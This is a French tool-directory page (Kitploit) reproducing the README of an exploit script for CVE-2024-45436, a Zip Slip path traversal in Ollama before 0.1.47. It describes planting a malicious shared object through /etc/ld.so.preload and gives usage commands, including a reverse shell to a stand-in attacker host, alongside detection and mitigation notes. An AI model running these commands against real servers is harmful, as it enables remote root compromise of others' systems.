Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-45436 — exploit script for CVE-2024-45436 | Kitploit
Outils/GitHubGitHub/srcx404/cve-2024-45436
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubsrcx404/cve-2024-45436

CVE-2024-45436

exploit script for CVE-2024-45436

Voir le dépôt
5il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit CVE-2024-45436 d'Ollama

Une implémentation propre et efficace de l'exploit pour la vulnérabilité de traversée de ZIP d'Ollama (CVE-2024-45436). 中文文档:README_CN.md

Description de la vulnérabilité

CVE-2024-45436 est une vulnérabilité de traversée de chemin (également connue sous le nom de « Zip Slip ») dans Ollama versions antérieures à 0.1.47. Cette vulnérabilité permet aux attaquants d'écrire des fichiers à des emplacements arbitraires du système de fichiers en exploitant une validation incorrecte des chemins lors des opérations d'extraction de fichiers ZIP.

Le défaut se trouve dans la fonction extractFromZipFile du fichier model.go d'Ollama, qui extrait les fichiers de modèle. Lorsqu'un fichier ZIP contient des entrées avec des chemins incluant des séquences de traversée de répertoire (../), Ollama extrait ces fichiers en dehors du répertoire prévu, permettant potentiellement à un attaquant de remplacer des fichiers système critiques.

Mécanisme de l'exploit

Cet exploit tire parti de la vulnérabilité en suivant l'approche suivante :

  1. Crée un fichier objet partagé malveillant (hook.so) contenant du code d'exécution de commande arbitraire
  2. Le conditionne dans un fichier ZIP spécialement conçu avec des entrées de traversée de chemin :
    • ../../../../../../../../../../etc/ld.so.preload - Utilisé pour précharger des objets partagés personnalisés
    • ../../../../../../../../../../tmp/hook.so - L'objet partagé malveillant lui-même
  3. Télécharge le fichier ZIP via l'API blob d'Ollama
  4. Crée un modèle faisant référence au blob téléchargé
  5. Déclenche l'exécution en demandant des embeddings à Ollama

Lorsqu'il est exécuté avec succès, la charge utile s'exécute avec les mêmes permissions que le service Ollama, permettant potentiellement une exécution de code à distance en tant que root.

Prérequis

  • Python 3.6+
  • Paquets Python requis :
    • requests
    • argparse
  • GCC (pour compiler l'objet partagé)
  • Une instance Ollama vulnérable (antérieure à 0.1.47) fonctionnant sous Linux

Utilisation

root@kitploit:~
python exp.py <target_url> <command>

Arguments

  • target_url : L'URL de l'instance Ollama vulnérable (par exemple http://example.com:11434)
  • command : La commande à exécuter sur le système cible

Options

  • --no-cleanup : Ne pas supprimer les fichiers temporaires après l'exploitation (utile pour le débogage)

Exemples

Utilisation de base :

root@kitploit:~
python exp.py http://target-server:11434 "id > /tmp/pwned"

Shell inversé :

root@kitploit:~
python exp.py http://target-server:11434 "bash -c 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1'"

Avertissement

Cet outil est fourni uniquement à des fins éducatives et de test de sécurité autorisé. Toute utilisation non autorisée contre des systèmes sans autorisation explicite est illégale et contraire à l'éthique. L'auteur décline toute responsabilité en cas d'utilisation abusive de ce logiciel.

Détection

Les organisations peuvent détecter si elles sont vulnérables en :

  1. Vérifiant leur version d'Ollama avec /api/version
  2. Recherchant des fichiers inattendus dans /etc/ld.so.preload ou /tmp/hook.so
  3. Surveillant les activités inhabituelles de création de modèles

Atténuation

  • Mettre à jour Ollama vers la version 0.1.47 ou ultérieure
  • Si une mise à jour immédiate n'est pas possible, restreindre l'accès réseau aux points de terminaison de l'API Ollama
  • Exécuter Ollama avec des privilèges minimaux, pas en tant que root

Détails techniques

La vulnérabilité exploite une validation de chemin incorrecte dans le processus d'extraction de fichiers ZIP d'Ollama. Lorsqu'un modèle est chargé via l'API, l'application extrait les fichiers d'une archive ZIP sans nettoyer correctement les chemins de fichiers, permettant des attaques de traversée de répertoire.

Le fichier ld.so.preload est utilisé sous Linux pour spécifier les bibliothèques partagées qui doivent être chargées avant toutes les autres. En écrivant dans ce fichier, l'attaquant peut s'assurer que sa bibliothèque malveillante est chargée par tout nouveau processus, détournant ainsi l'exécution du programme.

Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

Télécharger l’outil